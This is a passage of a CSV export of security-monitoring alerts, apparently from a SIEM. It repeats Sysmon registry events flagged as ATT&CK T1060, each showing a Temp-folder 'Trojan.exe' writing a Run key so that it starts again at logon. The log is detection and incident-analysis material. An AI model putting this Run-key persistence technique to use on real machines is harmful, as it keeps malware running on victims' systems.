..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:00.783387300Z"",""eventRecordID"":""1952"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:00.778\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:00.778"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:03.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:59.777 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:59.778918300Z"",""eventRecordID"":""1951"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:59.777\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:59.777"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:02.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:58.762 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:58.764128900Z"",""eventRecordID"":""1950"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:58.762\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:58.762"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:01.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:57.746 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:57.748048200Z"",""eventRecordID"":""1949"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:57.746\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:57.746"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:00.144",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:56.731 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:56.737863200Z"",""eventRecordID"":""1948"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:56.731\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:56.731"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:59.128",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:55.715 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:55.717702300Z"",""eventRecordID"":""1947"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:55.715\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:55.715"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:58.206",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:54.699 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:54.701127900Z"",""eventRecordID"":""1946"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:54.699\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:54.699"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:58.190",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:53.684 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:53.685269100Z"",""eventRecordID"":""1945"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:53.684\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:53.684"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:58.097",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:52.668 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:52.669576400Z"",""eventRecordID"":""1942"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:52.668\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:52.668"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:55.049",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:51.652 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:51.658811200Z"",""eventRecordID"":""1941"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:51.652\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:51.652"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:54.055",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:50.621 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:50.622801300Z"",""eventRecordID"":""1940"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:50.621\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:50.621"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:53.020",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:49.605 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 